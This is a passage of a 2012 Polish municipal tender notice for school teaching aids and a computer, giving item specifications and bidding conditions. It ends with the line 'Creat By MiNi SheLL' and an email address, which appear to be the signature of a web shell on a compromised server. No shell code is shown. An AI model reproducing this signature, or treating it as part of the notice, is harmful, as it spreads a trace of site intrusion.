Materiał składa się z tafelków oraz podstawy ,na której się je układa. Trening 10 zawiera minimum 588 zadań dotyczących przestrzeni liczbowych do 20, trening 1x1 zawiera minimum 784 zadania, trening 100 zawiera minimum 784 zadania w przestrzeni liczbowej do 100
8
8
36
Trener Heineveetter z automatyczną kontrolą wyników: trener 1x1
8
37
Trener Heineveetter z automatyczną kontrolą wyników: trening 100
38
Magiczne liczby w skrzynce
Zaw: minimum 30 magnetycznych płytek czerwono-niebieskie o śr.minimum 2cm, 108 bloczków z liczbami i znakami arytmetycznymi z twardej pianki pokryte laminatem
16
39
Karty pracy do skrzynki magnetycznej zestaw I
Minimum 35 kart pracy formatu A4 w tym minimum 5 arkuszy z rozwiązaniami zakres do 10
2
40
Karty pracy do skrzynki magnetycznej zestaw II
Minimum 35 kart pracy format A4 w tym minimum 5 arkuszy z rozwiązaniami, zakres do 20
2
41
Gitara akustyczna 30 do edukacji
Gitara AL2330 szer. siodełka 4 cm, strunnik 48cm
4
42
Globus do opisywania
Pusty globus o śr około. 28cm + 8 kolorowych pisaków
8
43
Bębny Bongo duży
Para, śr minimum 21cm i 16 cm, membrany z naturalnej skóry, obręcze naciągowe z lekkiego metalu, wykonane z jasnego drewna, lakierowane.
1
44
Bębny Bongo mały
Para śr. minimum .19 cm i 16 cm, waga minimum 2,5 kg, 4 naciągi z jasnego i ciemnego drewna
3
45
ABC-magnetyczne litery w skrzynce
W skrzynce znajduje się minimum 213 dużych i małych liter, wykonanych z twardej pianki, skrzynka o wym. minimum  31,4x 22,5 cm ze stali nierdzewnej.
10
46
Zestaw z 6 zapasowymi strunami do gitary akustycznej 30
Struny do gitary- szt. 6.
2
47
Liczydło stojące
Wym. minimum 120 cm 85cm, koraliki w 2 kolorach
4
48
Flet prosty
Flet prosty wykonany z tworzywa sztucznego minimum 32,5 cm
8
49
Zestaw instrumentów 2
5 instrumentów: drewniane jajka, tamburyn, pałeczka z dzwoneczkami, drewniane jingle, taneczne łyżeczki
8
50
Dzwonki chromatyczne
26 dzwonków z półnutami włącznie dł. minimum 41 cm, szer. minimum 30 cm
8
51
Inteligencje wielorakie w nauczaniu ortografii -7walizek
Format A4 minimum118 kolorowych i czarno-białych kart, 2 teczki
1
52
Reksio i ortografia gra dydaktyczna
Zestaw komputerowych gier ortograficznych
10
53
Poznajemy miasta Polski
Minimum 20 plansz A3, zdjęcia i uproszczone rysunki oraz herby miast, książeczkami i legendami oraz rysunkami do kolorowania
6
54
Piosenki dla dzieci na różnw okazje
Książka o formacie minimum B5, minimum 72 strony + 2 płyty CD
1
55
Idziemy na zakupy
Gra- składająca się z minimum 12 kart- wózków, minimum 55 kart z zabawkami, minimum 75 monet oraz instrukcji
2
56
Trener pamięci - zadania logioczne
Gra- zadania logiczne. Zestaw zawiera podstawę,minimum  16 żetonów, minimum 16 nominowanych kart
4
57
Mnożenia- Schubitrix
 Domino w pudełeczkach- minimum 24 elementy o wymiarach minimum 4x 8 cm
4
58
Magnetyczne ułamki 
Listwy z tworzywa sztucznego,minimum minimum 9 różnych kolorów, od 1 1 do 1 12 wymiary 1 1 minimum 100x10 cm
2
59
Pierwsze ułamki - domino
Duże elementy z tworzywa sztucznego,minimum 24 sztuki o wymiarach minimum  6x12 cm
8
60
Sylaby w dominie
Gra dydaktyczna. Zawartość pudełka:minimum  56 kostek domina, klepsydra, worek, minimum 16 żetonów, karta wyrazów, instrukcja
4
61
Historyjki obrazkowo-zdaniowe z pytaniami
Format A4, oprawa: teczka, zeszyt A5, minimum 16 str, plansze:minimum 21- dwustronnie kolorowych kart, plasikowe kieszonki
1
62
Suwaki terapeutyczne-pociągi
Zestaw: minimum 24 pociągi format A4, teczka:minimum  17 kolorowych kart,minimum  32 str. zeszyt
1
63
Suwaki terapeutyczne-tarcze
Zestaw: minimum 30 tarcz format A4, teczka: minimum 16 kolorowych kart, minimum 40 str. zeszyt
1
64
Suwaki terapeutycznr-windy
Zestaw: format A4, teczka: minimum 16 kolorowych kart,minimum  24 suwaki + zeszyt
1
65
Suwaki terapeutyczne-gąsiennice
Zestaw: format A4, minimum 20 kolorowych kart,minimum  28 str. zeszyt, teczka
1
66
Mały szkielet
Na statywie -minimum 80 cm wysoki
2
67
Matematyka w obrazakach
Zawartość minimum 196 części magnetycznych minimum 140 części, liczmany po 10, wielkość ok. 13 cm,minimum 42 części  po 2 liczby od 0 do 20, wielkość ok. 5,3x5,3, 14części  po 2 z podstawowych znaków arytmetycznych 
2
68
Mikroskop-jajo
Mikroskop i kamera w jednym, z możliwością podłączenia do komputera, powiększenie od 50 do 400 razy
8
69
Sortowanie odpadów -sprzatnie planety 
Gra planszowa: plansza minimum 39x39 cm, 4  ciężarówki,minimum  20 pojemników do sortowania 
1
70
Gra -mały ekolog
Gra planszowa: plansza do gry,minimum 4 postacie, 1minimum  kostka do gry, instrukcja
1
71
Obieg wody w przyrodzie
Symulator składa się ze: zbiorniczka na wodę, pokrywy, nakładki na chmurę, podstawki
1
72
bawimy się liczbami-magnetyczne plansze
Zestaw zawiera: minimum  12 sztuk o wymiarach minimum 25x5 cm magnetycznych kart, minimum 60 szt o wymiarach minimum 4,8x4,8 cm magnetycznych żetonów, instrukcję
8
73
Kalendarz
Tablica magnetyczna o wym minimum 70x50 cm, minimum  4 ilustracje z porami roku, minimum  16 ilustracji- puzzli,minimum  6 strzałek, minimum 31 kartoników, minimum 10 winiet, torba z magnesami
8
74
EduSensus-pakiet-uczeń zdolny program do tablicy interaktywnej
Program do prowadzenia zajęć dodatkowych z uczniami zdolnymi metodą projektu edukacyjnego
1
75
Zabawne godziny
Gra zawiera minimum 4 plansze o wym; minimum 43x23,5 cm, kartonowe żetony minimum 20 szt, karty zadaniowe
4
76
Gra Twist-Która godzina?
Gra zawiera jedną ruletkę o wym minimum 20x20 cm,minimum  1 kartę do ruletki,minimum  4 karty do gry, minimum 48 kart z godzinami , instrukcję
8
77
Warsztaty graficzne 1
Minimum 30 kart ze wzorami, minimum 4 teczki z tworzywa o wym. minimum 21x30 cm, minimum 10 zmywalnych mazaków
2
78
Warsztaty graficzne 2
minimum 30 kart z wzorami, minimum 4 teczki z tworzywa o wym .minimum  21x30 cm,minimum  10 zmywalnych mazaków
2
79
Pokrowiec na gitarę
Do gitary klasycznej, wykonany z wodoodpornego , nierwącego materiału- po zewnętrznej stronie kieszenie na akcesoria
4
80
Scope-kamera obiektowa do niesamowitych,szczegółowych ujęć
Dane techniczne minimalne: rozdzielczość 1.300. 000 pikseli, zoom: 10- 200-krotny, oświetlenie- 6 lampek LED, interface- USB, długość szyjki- minimum 40  cm, wbudowany mikrofon
1
81
Polski alfabet-dywanik
Mata do zabawy i poznawania liter z antypoślizgowym podłożem, wymiary minimum 200x100 cm
1
82
Pieniązki edukacyjne EUR
Imitacja europejskiej waluty :minimum 5 rodzajów banknotów oraz minimum 16 monet
1
83
Zestaw kontrolny PUS-układanki edukacyjne
Zamykane pudełko z minimum 12 ponumerowanymi klockami
10
84
Idę do szkoły-część I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
85
Idę do szkoły-część II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
86
Idę do szkoły-część III-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
87
Idę do szkoły-część IV-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
88
Rusz głową część I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
89
Rusz głową część II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
90
Skoncentruj się część I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
91
Skoncentruj się część II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
92
Przymiotnik I Jaki?Jaka?Jakie?-karty do zestawu  PUS
Książeczki do zestawu kontrolnego PUS
5
93
Rzeczownik I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
94
Rzeczownik II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
95
Łatwe ćwiczenia do nauki czytania część I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
96
Łatwe ćwiczenia do nauki czytania część II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
97
Łatwe ćwiczenia do nauki czytania część III-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
98
Łatwe ćwiczenia do nauki czytania część IV-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
99
ABC Rozpoznawanie i rozróżnianie liter część I-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
100
ABC Rozpoznawanie i rozróżnianie liter część II-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
101
ABC Dwuznaki-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
102
Czasownik .Co robi?Co robią?-karty do zestawu PUS
Książeczki do zestawu kontrolnego PUS
5
103
Ortografia-zmiękczenia-karty do zestawu PUS
Książka zawierająca ćwiczenia utrwalająca znajomość pisowni wyrazów ze spółgłoskami miękkimi
5
104
311 szlaczków i zygzaczków
Ćwiczenia grafomotoryczne usprawniające rękę piszącą
1
105
Ćwiczenia kaligraficzne dla klas 0-1 część I
Minimum 109 stron. Z literami alfabetu, Piszę po śladzie, część 1
1
106
Detektyw ortografek.Ortograficzne ćwiczenia percepcji wzrokowej
Format minimum A4,minimum 80 str- autor Małgorzata Barańska
1
107
Zabawy słuchowe
Ćwiczenia dla uczniów klas 0 i I-III, format minimum  A4,minimum  36 str + CD
1
108
Perskie oko 
Ćwiczenia percepcji wzrokowej dla dzieci w młodszym wieku szkolnym, format minimum A4, zeszyt minimum 8 str,minimum  50 kolorowych kart, teczka
1
109
Poznaję cyferki
Zestaw zawiera mi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.23.60.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Spełnienie tego warunku będzie oceniane na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku będzie oceniane na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku będzie oceniane na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku będzie oceniane na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku będzie oceniane na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szadek.bip.cc<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Szadek
ul. Warszawska 3
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 10:00, miejsce: Urząd Gminy i Miasta Szadek
ul. Warszawska 3
98-240 Szadek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków Unii Europejskiej  Programu Operacyjnego Kapitał Ludzki, Działania 9.1, Poddziałania 9.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozdział 1 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Komputer z monitorem-1 szt.
Parametry minimalne: procesor 2,4 GHz, Ram 2 GB, HDD 200 GB, DVD-R, System oper. Wind 7, sieć, grafika, audio zintegr., klawiatura, mysz, monitor LCD 19.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com